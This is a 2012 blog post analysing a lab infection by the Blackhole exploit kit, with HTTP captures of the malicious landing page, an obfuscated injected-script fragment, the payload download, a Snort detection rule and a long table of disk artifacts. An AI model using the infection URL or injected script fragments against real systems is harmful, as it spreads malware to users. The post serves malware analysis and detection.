Fort Knox Networks: September 2012

Recently, I've been concentrating my activities on disk artifacts post-infection. Today, I fired up my lab and infected a system while grabbing as much information as possible.

Infection Point: hxxp://46.249.59.116/main.php?page=5a56c997ffff2f79

Date: 09/22/2012

Platform: Windows XP Pro, SP3, unpatched, Java 6 Update 29, Windows Media Player 9, No Adobe Flash, No Adobe Reader, IE 8, Windows Firewall Disabled, No AV.

Retention: Once this completed I took a full snapshot of the entire disk, to share or analyze further later. If you would like it, just twitter me @fknsec. The snapshot is about 1GB uncompressed.

Methodology: A snapshot of the entire disk and registry was taken prior to infection and compared against post infection for delta. Wireshark and IE were the only active applications on the system. I used Wireshark, Installrite, VirtualBox, Windows XP and IE8. It should be noted that in the disk capture, Windows Media player did go through its initial startup.

The Infection

First and foremost, I entered the URL into Internet Explorer, where Java launched I was presented with the standard "Please wait while page is loading" in the center of the screen. The first file served up to me was Gam.jar. Response is nginx chunked, nothing unusual here.

GET /main.php?page=5a56c997ffff2f79 HTTP/1.1

Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)

Accept-Encoding: gzip, deflate

Host: 46.249.59.116

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 22 Sep 2012 16:32:10 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.15

1fb8

<html><body><applet archive="Gam.jar"/code="plugindetecta.plugindetecta"><param name="uid" value=N0b0909041f31312b343c272b3e3c423e3c373734310a3c040b043d2c393e2900373e0235391c /></applet><script>md="a";r="replace";rrr="getAttribute";rr="reverse";</script><b id="b"

Searching on the opening offset:0 of the response, I come up with 313 hits in google, mostly from jsunpack, including some variations like this (with a missing "/" after Gam.jar":

<html><body><applet archive="Gam.jar" code="importantThinga.importantThinga">

http://jsunpack.jeek.org/dec/go?report=cecd770436c23a953511f66befcc12da8cbeb7cb

Additionally, some of the entries noted come back with the <script>abre variant with is all too common with SQL injected Wordpress pages.

<script>try{awebw++;}catch(awtbawt){try{nta23t|15232}catch(tabsd){m=Math;ev=window[""+"e"+"val"];

http://jsunpack.jeek.org/dec/go?report=71f9a841aeebe2944633c46950f9848a4a8c8bb6

I am currently aware of approximately 1,600+ Wordpress sites which are currently infected with this script. Some of these triggered AVG's online shield

Next, Windows Media player was launched with the file name hcp_asx. I found it interesting that this version of blackhole hit Windows Media player for exploit before any other available exploits on the system. Not going to get into this because some analysis already exists here and those of you using snort are likely familiar with this rule:

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
$HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP ovflow Media
Player lt 10"; flow:established,to_server; content:"/hcp_asx.php?f=";
http_uri; pcre:"/hcp_asx\.php\?f=\d+$/U"; classtype:trojan-activity;
sid:2013077; rev:1;)

So the system was compromised by blackhole and a bunch of stuff happened. Let's look at what happens on the disk. The binary was delivered HTTP attachment.

GET /w.php?f=97d19&e=0 HTTP/1.1
User-Agent: Java/1.6.0_29
Host: 46.249.59.116
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 22 Sep 2012 16:32:21 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.15
Pragma: public
Expires: Sat, 22 Sep 2012 16:32:21 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="about.exe"
Content-Transfer-Encoding: binary
Content-Length: 288615

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

No callouts were observed.

What Happened on The Disk

The creation of v.class by the root process java as well as the downloaderwgsdgsdgdsgsd.exe in the users temp folder is consistent with most of the activity I have been analyzing lately.

A full list here is included of all the files created, edited (size changes) and deleted from the system, as well as all registry entries.

I was well aware of hsperfdata_%username% as a disk artifact, not necessarily of infection, but as an indicator that java had executed at a specific time/date stamp. There were a series of cache folders and files that were also created under....

documents and settings\%username%\Application Data\Sun\Java\Deployment\cache\6.0

Anywho... here is a dump of all the delta from the disk Admittedly some of this is the result of normal operations, however, I believe there is some good information on disk artifacts including the hsperfdata and the java cache information.

backhole1 - All Files

FileName	Size Before	Size After	Attrib Before	Attrib After	Date Before	Date After
C:\Documents and Settings\bomber\Application Data\Cesy		1KB		D
C:\Documents and Settings\bomber\Application Data\Cesy\aqowe.ydb		2KB		A		9/22/2012 12:34:00 PM
C:\Documents and Settings\bomber\Application Data\Feuw		1KB		D
C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe		289KB		A		9/22/2012 12:31:30 PM
C:\Documents and Settings\bomber\Application Data\Riafew		1KB		D
C:\Documents and Settings\bomber\Application Data\Riafew\xiryq.quy		1KB		A		9/22/2012 12:31:30 PM
C:\Documents and Settings\bomber\Application Data\Wireshark		1KB		D
C:\Documents and Settings\bomber\Application Data\Wireshark\dfilters		1KB		A		9/22/2012 12:32:39 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book		1KB		D
C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab		177KB		A		9/22/2012 12:31:40 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab~		177KB		A		9/22/2012 12:31:40 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Crypto\RSA\S-1-5-21-484763869-706699826-1060284298-1003\6b29ae44e85efac3c72ff4d1865d73f1_72b2dab9-a324-4085-acf9-f7c87e24dedd		1KB		SA		9/22/2012 12:30:18 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk		1KB		A		9/22/2012 12:33:46 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Media Player\0009236B.wpl		1KB		A		9/22/2012 12:34:04 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\0		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\1		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\10		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\11		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\12		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\13		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\14		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\15		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\16		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\17		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\18		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\19		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\2		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\20		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\21		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\22		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\23		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\24		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\25		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\26		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\27		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\28		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\29		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\3		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\30		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\31		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\32		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\33		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\34		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\35		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\36		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\37		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\38		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\39		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\4		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\40		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\41		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\42		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\42\32fd55ea-33417afb		34KB		A		9/22/2012 12:31:27 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\42\32fd55ea-33417afb.idx		1KB		A		9/22/2012 12:31:27 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\43		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\44		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\45		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\46		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\47		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\48		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\49		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\5		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\50		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\51		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\52		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\53		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\54		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\55		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\56		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\57		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\58		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\59		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\6		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\60		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\61		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\62		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\63		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\7		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\8		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\9		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\host		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\lastAccessed		1KB		A		9/22/2012 12:31:27 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\muffin		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\tmp		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\deployment.properties		1KB		A		9/22/2012 12:31:23 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\ext		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\log		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\0		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\1		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\10		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\11		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\12		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\13		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\14		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\15		1KB		D
C:\Documents and Settings\bomber\Cookies\index.dat	33KB	33KB	HSA	HSA	9/22/2012 12:25:05 PM	9/22/2012 12:34:01 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Feeds Cache\index.dat	33KB	33KB	HSA	HSA	9/22/2012 12:16:43 PM	9/22/2012 12:28:34 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\DOMStore\index.dat	33KB	33KB	HSA	HSA	9/22/2012 12:16:43 PM	9/22/2012 12:29:35 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\DOMStore\A9JWFLPR\www.google[1].xml	1KB	1KB	A	A	9/22/2012 12:16:54 PM	9/22/2012 12:30:05 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG	2KB	2KB	HA	HA	9/22/2012 12:25:23 PM	9/22/2012 12:31:45 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML	13KB	13KB	A	A	9/22/2012 11:35:30 AM	9/22/2012 12:31:25 PM
C:\Documents and Settings\bomber\Local Settings\History\History.IE5\index.dat	66KB	66KB	HSA	HSA	9/22/2012 12:25:05 PM	9/22/2012 12:34:01 PM
C:\Documents and Settings\bomber\Local Settings\History\History.IE5\MSHist012012092220120923\index.dat	50KB	50KB	HSA	HSA	9/22/2012 12:16:43 PM	9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temp\jusched.log	2KB	9KB	A	A	9/22/2012 12:25:07 PM	9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\index.dat	443KB	476KB	HSA	HSA	9/22/2012 12:25:05 PM	9/22/2012 12:34:01 PM
C:\Documents and Settings\bomber\PrivacIE\index.dat	115KB	115KB	HSA	HSA	9/22/2012 12:16:43 PM	9/22/2012 12:28:34 PM
C:\Documents and Settings\bomber\Start Menu\Programs\Windows Media Player.lnk	1KB	1KB	A	A	9/22/2012 11:50:09 AM	9/22/2012 12:33:46 PM
C:\Documents and Settings\bomber\Start Menu\Programs\Accessories\Entertainment\Windows Media Player.lnk	1KB	1KB	A	A	9/22/2012 11:50:09 AM	9/22/2012 12:33:46 PM
C:\Documents and Settings\NetworkService\Cookies\index.dat	17KB	17KB	HSA	HSA	9/22/2012 11:48:42 AM	9/22/2012 12:24:04 PM
C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat	17KB	17KB	HSA	HSA	9/22/2012 11:48:42 AM	9/22/2012 12:24:04 PM
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat	33KB	33KB	HSA	HSA	9/22/2012 11:48:42 AM	9/22/2012 12:24:04 PM
C:\WINDOWS\wmsetup.log	1KB	2KB	A	A	9/22/2012 11:50:09 AM	9/22/2012 12:33:46 PM
C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf	14KB	15KB	A	A	9/22/2012 12:18:35 PM	9/22/2012 12:31:32 PM
C:\WINDOWS\Prefetch\CSRSS.EXE-12B63473.pf	25KB	25KB	A	A	9/22/2012 12:26:54 PM	9/22/2012 12:28:23 PM
C:\WINDOWS\Prefetch\IEXPLORE.EXE-27122324.pf	113KB	123KB	A	A	9/22/2012 12:16:49 PM	9/22/2012 12:28:43 PM
C:\WINDOWS\Prefetch\JAVAW.EXE-2DC32ABC.pf	50KB	107KB	A	A	9/22/2012 11:58:50 AM	9/22/2012 12:34:06 PM
C:\WINDOWS\Prefetch\NET.EXE-01A53C2F.pf	14KB	18KB	A	A	9/22/2012 12:18:30 PM	9/22/2012 12:33:30 PM
C:\WINDOWS\Prefetch\NET1.EXE-029B9DB4.pf	15KB	19KB	A	A	9/22/2012 12:18:30 PM	9/22/2012 12:33:30 PM
C:\WINDOWS\Prefetch\REGSVR32.EXE-25EEFE2F.pf	60KB	61KB	A	A	9/22/2012 11:50:16 AM	9/22/2012 12:34:07 PM
C:\WINDOWS\Prefetch\TASKMGR.EXE-20256C55.pf	19KB	21KB	A	A	9/22/2012 12:07:22 PM	9/22/2012 12:31:46 PM
C:\WINDOWS\Prefetch\UNREGMP2.EXE-07CACB61.pf	26KB	39KB	A	A	9/22/2012 11:50:09 AM	9/22/2012 12:33:46 PM
C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf	20KB	21KB	A	A	9/22/2012 12:26:26 PM	9/22/2012 12:33:46 PM
C:\WINDOWS\Prefetch\WINLOGON.EXE-32C57D49.pf	33KB	33KB	A	A	9/22/2012 12:26:54 PM	9/22/2012 12:28:24 PM
C:\WINDOWS\system32\CatRoot2\edb.chk	9KB	9KB	A	A	9/22/2012 12:26:41 PM	9/22/2012 12:28:41 PM
C:\WINDOWS\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb	3,154KB	3,154KB	A	A	9/22/2012 12:26:13 PM	9/22/2012 12:28:13 PM
C:\WINDOWS\system32\config\system.LOG	2KB	2KB	HA	HA	9/22/2012 12:26:22 PM	9/22/2012 12:33:33 PM
C:\WINDOWS\system32\wbem\Logs\wbemcore.log	38KB	38KB	A	A	9/22/2012 12:21:49 PM	9/22/2012 12:31:35 PM
C:\WINDOWS\system32\wbem\Logs\wbemess.log	3KB	4KB	A	A	9/22/2012 12:25:07 PM	9/22/2012 12:33:30 PM
C:\WINDOWS\system32\wbem\Logs\wbemprox.log	1KB	1KB	A	A	9/22/2012 11:49:59 AM	9/22/2012 12:31:35 PM
C:\WINDOWS\system32\wbem\Logs\wmiprov.log	1KB	1KB	A	A	9/22/2012 11:55:29 AM	9/22/2012 12:28:16 PM
C:\Documents and Settings\bomber\Cookies\GVNZ58AI.txt	1KB		A		9/22/2012 12:06:45 PM
C:\Documents and Settings\bomber\Cookies\J695B3FR.txt	1KB		A		9/22/2012 12:05:35 PM
C:\Documents and Settings\bomber\Cookies\JTYOEQBQ.txt	1KB		A		9/22/2012 12:16:44 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{E4F1361D-04D0-11E2-A16B-08002765500A}.dat	5KB		A		9/22/2012 12:23:34 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{E4F1361F-04D0-11E2-A16B-08002765500A}.dat	52KB		A		9/22/2012 12:17:00 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\urlquery_net[1].htm	41KB		A		9/22/2012 12:05:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\google_com[1].htm	108KB		A		9/22/2012 12:16:53 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\qsonhs[2].aspx	1KB		A		9/22/2012 12:16:45 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\redir_not_found[1].htm	6KB		A		9/22/2012 12:05:35 PM
C:\System Volume Information	1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\16		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\17		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\18		1KB		D
C:\Documents and Settings\bomber\Application . Data\Sun\Java\Deployment\SystemCache\6.0\19		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\2		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\20		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\21		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\22		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\23		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\24		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\25		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\26		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\27		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\28		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\29		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\3		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\30		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\31		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\6c34baa0-5fe37a94		1KB		A		9/22/2012 12:30:18 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\6c34baa0-5fe37a94.idx		1KB		A		9/22/2012 12:30:18 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\33		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\34		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\35		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\36		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\37		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\38		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\39		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\4		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\40		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\41		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\42		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\43		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\44		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\45		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\46		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\47		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\48		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\49		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\5		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\50		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\51		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\52		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\53		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\54		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\55		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\56		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\57		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\58		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\59		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\6		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\60		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\61		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\62		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\63		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\7		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\8		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\9		1KB		D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\lastAccessed		1KB		A		9/22/2012 12:30:18 PM
C:\Documents and Settings\bomber\Cookies\GTT5VL6M.txt		1KB		A		9/22/2012 12:30:58 PM
C:\Documents and Settings\bomber\Cookies\HR7RSVJY.txt		1KB		A		9/22/2012 12:28:37 PM
C:\Documents and Settings\bomber\Cookies\OCZY31FB.txt		1KB		A		9/22/2012 12:29:38 PM
C:\Documents and Settings\bomber\Cookies\SQUKNA2Q.txt		1KB		A		9/22/2012 12:29:18 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities		1KB		D
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}		1KB		D
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft		1KB		D
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express		1KB		D
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Folders.dbx		76KB		A		9/22/2012 12:31:40 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Inbox.dbx		143KB		A		9/22/2012 12:31:39 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Offline.dbx		10KB		A		9/22/2012 12:31:40 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Sent Items.dbx		77KB		A		9/22/2012 12:31:39 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{8CFA7582-04D2-11E2-A16C-08002765500A}.dat		5KB		A		9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{8CFA7583-04D2-11E2-A16C-08002765500A}.dat		28KB		A		9/22/2012 12:29:27 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{B1CEB060-04D2-11E2-A16C-08002765500A}.dat		33KB		A		9/22/2012 12:30:24 PM
